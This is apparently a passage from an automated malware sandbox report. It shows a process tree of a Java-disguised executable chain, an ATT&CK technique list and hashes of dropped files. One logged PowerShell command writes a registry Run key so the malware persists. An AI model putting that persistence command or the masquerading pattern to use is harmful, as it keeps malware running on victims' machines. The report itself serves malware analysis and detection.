  ping 127.0.0.1 -n 1
  2⤵
  PID:1156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5992
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12768
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9792
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3732
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9616
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13912
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10680
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5208
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6592
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6560
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8616
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4584
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9728
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10584
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10904
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5300
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11464
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11756
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11964
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12052
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12508
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1832
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5472
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3700
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6768
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1044
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6992
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4168
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4732
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7064
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7116
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3464
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1052
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7472
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7668
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4208
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8464
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6844
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13140
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8488
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8668
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8816
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8968
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9464
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9524
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10356
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:4704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10972
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4672
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12516
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12688
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12560
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8300
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8208
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:644
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13432
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7040
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7140
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5508
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2056
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2068
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7208
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1820
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9020
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5576
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:32

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:10092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5888 -ip 5888
1⤵
PID:13208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:7708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 10748 -ip 10748
1⤵
PID:11664

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:13572

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:12880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe"
1⤵
PID:7432
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  2⤵
  PID:11568
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
    3⤵
    PID:10092
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
      4⤵
      PID:3432
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        5⤵
        
        PID:3500
      - C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        6⤵
        
        PID:8476
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        7⤵
        
        PID:8356
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        8⤵
        
        PID:8832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        9⤵
        
        PID:10828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        10⤵
        
        PID:10864
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        11⤵
        
        PID:11076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        12⤵
        
        PID:11236
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime.exe"
        13⤵
        Modifies registry key
        
        PID:11636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe\"'"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:13384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe"
1⤵
PID:13816
- C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
  2⤵
  PID:1876
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
    3⤵
    PID:412
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      4⤵
      PID:7988
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        5⤵
        
        PID:7624

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\7gdjwt0hln.exe

Filesize
850KB

MD5
260faa08dbff4bc7ca6346061f42b956

SHA1
ccef508bb2693b097510015ef89ebb8f0289c5c1

SHA256
c47a55b842177445756163ca2d5cadaed5cdd4d313d7897b9aaac8e1d1c6e810

SHA512
ae30c903720f58abef12b9e091872d4a6470bae5ba246fc1d35dbaa4aecad04803647a0339490090a037de780b09df4282d5cc6247731729bf24e8fe872c42dc

Download Submit
C:\ProgramData\GCAFCAFHJJDBFIECFBKE

Filesize
56KB

MD5
0e2c60740cafa19c5158f4aa41a5d4e7

SHA1
f01d0f359e407fed424c30919ed64b77508b3024

SHA256
ce41f2a3255df2099ae8eea9364bd28c6fd6a56c8ca3290bd274944d16d9e6bf

SHA512
e367b88f1d984f84b9b4a8fa4002ede1afad0d375f9374636250f17e64445a60d1b99fe23a0b314c4b2bd5fd27fe5b87fa4079a84b4497629f238afd8436afe2

Download Submit
C:\ProgramData\a1dt0\26x4wt

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\a1dt0\dbas0z

Filesize
288KB

MD5
5ea5ade6ec10354b783ff9e3e98c3500

SHA1
9d501fd9a7ca63da2073c2dc4f427d926ac730d1

SHA256
d72b3ac67ec41f44b604ca3b851522887dc2c7df2f14e7d99c7b2c98d211455f

SHA512
bb90c0419de462a27fd1480077a20bfbf146bae5931d2c393c4f896a2f61c0c4afe3f0e149e0f34729467bac42379370d091f2a322ef73ecceb7f74b7ac6f4cc

Download Submit
C:\ProgramData\a1dt0\y5ppzm

Filesize
6KB

MD5
aac11fd54dd898f3ba1c66430eef1a95

SHA1
d992232d4af18b0abd132468f847303e319bc670

SHA256
96dca8f39151db369e33b06f4fba076c374fe23312a3c9edf34b005c27862b38

SHA512
cf9719bea2fea5db960d61e372848020002add7af96a284cb4fd296ffc8c979f879899f610040b0a96bac035670597e14b33094f477d537621632c6408e9ee77

Download Submit
C:\ProgramData\ecbas\lng4w4

Filesize
160KB

MD5
9b85a4b842b758be395bc19aba64799c

SHA1
c32922b745c9cf827e080b09f410b4378560acb3

SHA256
ecc8d7540d26e3c2c43589c761e94638fc5096af874d7df216e833b9599c673a

SHA512
fad80745bb64406d8f2947c1e69817cff57cc504d5a8cdca9e22da50402d27d005988f6759eaa91f1f7616d250772c9f5e4ec2f98ce7264501dd4f436d1665f0

Download Submit
